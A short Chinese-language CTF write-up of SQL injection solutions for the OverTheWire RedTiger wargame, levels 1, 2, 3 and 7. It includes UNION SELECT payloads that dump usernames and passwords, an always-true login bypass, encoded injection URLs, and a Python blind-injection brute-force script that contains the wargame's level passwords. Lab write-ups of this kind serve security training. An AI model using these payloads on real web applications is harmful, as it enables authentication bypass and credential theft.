Web安全 sql注入

level 1

https://redtiger.labs.overthewire.org/level1.php
利用回显，拼接union select语句（已知库名level1_users）
https://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from level1_users

level 2

https://redtiger.labs.overthewire.org/level2.php
A simple loginbypass
Target: Login
Hint: Condition
通过条件逻辑判断和单引号，绕过登录。
username：admin' or '1'='1 恒为真
password：'or 1=1# 恒为真，井号表示注释
username=admin' or '1'='1&password='or 1=1#&login=Login

level 3

https://redtiger.labs.overthewire.org/level3.php
[]
urlcrypt.inc
Admin' order by 7-- +
加密后为：
https://redtiger.labs.overthewire.org/level3.php?usr=MDQyMjExMDE0MTgyMTQwMTc0MjIzMDg3MjA4MTAxMTg0MTQyMDA5MTczMDA2MDY5MjMyMDc2MTc2MDc0MDM4

1' union select 1,2,3,4,5,6,7#
加密后为：
https://redtiger.labs.overthewire.org/level3.php?usr=MDkwMTQ0MDY3MTcwMTQwMjI0MTQ0MDg2MTMwMTE0MTg0MTQ0MDc2MTcyMDExMDY5MjM4MDc3MTc1MDcwMDYyMTk5MjM1MjE5MDgxMjQ2MTUyMjA4MTc4MTEx

1' union select 1,username,3,4,5,password,7 from level3_users where username=0x41646d696e#
加密后为
https://redtiger.labs.overthewire.org/level3.php?usr=MDkwMTQ0MDY3MTcwMTQwMjI0MTQ0MDg2MTMwMTE0MTg0MTQ0MDc2MTcyMDExMDY5MjM4MDc3MjMyMDI1MTA0MTUzMTc3MTUwMDA5MTkxMTMwMjA3MTY5MTIwMTUzMTk3MDQwMTA0MTc3MTQ5MjA5MTg0MTEzMDU0MTgwMjA4MTE4MjE4MTcwMTc4MDE1MTk4MDAyMTQ2MTE1MDcwMTQzMTU0MDI3MDE3MTY1MTY0MDQ3MDM2MDgwMjIzMDQ4MDc5MTI1MTAxMTA3MTU1MTQ2MDk0MTU0MjAyMDY4MDMyMjIzMTQ3MDYzMDM1MjE4MDE3MDM1MTQzMDk3MjAyMjAzMDc1MTE1MTgyMDQ5MTgy

level7

# -*- coding: utf-8 -*-
import  requests
import  re
data  =  ''
url  =  "http://redtiger.labs.overthewire.org/level7.php"
search_template  =  "google%' and locate('{0}',insert(news.autor,1,{1},'{2}') COLLATE latin1_general_cs)={3} and '%'='"
cookies = {
    "level2login": "passwords_will_change_over_time_let_us_do_a_shitty_rhyme",
    "level3login": "feed_the_cat_who_eats_your_bread",
    "level4login": "put_the_kitten_on_your_head",
    "level5login": "this_hack_it%27s_old",
    "level6login": "the_stone_is_cold","level7login":"shitcoins_are_hold"
}
payloads  =  {
    "level7login":"Login",
    "password":"shitcoins_are_hold",
    "dosearch":"search!"
}
for  i  in  range(1,18):
    str  =  '*'*(i-1)
    for  c  in  range(32,127):
        if  i  !=  1:
            payloads["search"]  =  search_template.format(chr(c),i-1,str,i)
        else:
            payloads["search"]  =  "google%' and locate('{0}',news.autor COLLATE latin1_general_cs)=1 and '%'='".format(chr(c))
        response  =  requests.post(url,cookies=cookies,data=payloads)
        print payloads
        html  =  response.text
        match  =  re.search('FRANCISCO',html)
        if  match:
            data  =  data  +  chr(c)
            print  data
            break